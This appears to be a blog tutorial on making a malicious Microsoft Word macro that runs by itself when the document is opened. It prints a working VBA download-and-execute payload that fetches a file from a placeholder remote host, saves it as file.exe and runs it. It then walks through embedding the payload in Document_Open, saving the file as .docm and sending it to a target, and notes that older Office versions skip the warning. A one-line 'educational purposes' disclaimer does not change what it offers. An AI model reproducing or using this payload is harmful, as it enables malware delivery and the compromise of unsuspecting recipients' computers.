Creating Malicious Word Macros Tutorial : AutoRun Stub via Word Document
Penetration testers often need to use social engineering attacks . What is more better than creating a Microsoft Office Word document that contains the payload and exploit in form of a Macro . That is easy … might be common now ….
What if the Word Macro would Auto start and execute the payload instantly ? This pen testing tutorial explains exactly how to do that .
We will start by creating a Word Macro .
Creating Malicious Word Macros Tutorial
Step 1: Create a payload. Macros use VBS for macros, so it’s not hard to make them, but many are already made. Here is an example DL and Execute payload:
Sub AutoOpen() Dim xHttp: Set xHttp = CreateObject("Microsoft.XMLHTTP") Dim bStrm: Set bStrm = CreateObject("Adodb.Stream") xHttp.Open "GET", "http://<IP>/<FILE>", False xHttp.Send With bStrm .Type = 1 '//binary .Open .write xHttp.responseBody .savetofile "file.exe", 2 '//overwrite End With Shell ("file.exe") End Sub
Step 2: Now that you have a payload, you need to enable the developer option.
To do that, simply go to
File -> Options -> Customize Ribbon -> Click on the box for “Developer”
Step 3: Go to the Developer tab and click on “Visual Basic”
Step 4: Double click on ThisDocument
Step 5: Paste this code into the field that appears
Private Sub Document_Open()
Replace [payload] with the VBS script you’re using in your macro.
Here is a screen shot for better understanding :
Step 6: Now just save the file as filename.docm, send it to the target, and watch as it auto runs your stub. They may get a security warning about the macro, but if they’re running an older version of Microsoft Office, they won’t.
Please Feel free to post in comments in case you are stuck anywhere . This technique is for penetration testing and to be used only in Authorized Penetration tests by Penetration testers .
Purely for Educational Purposes !
Like and Share if you like the Post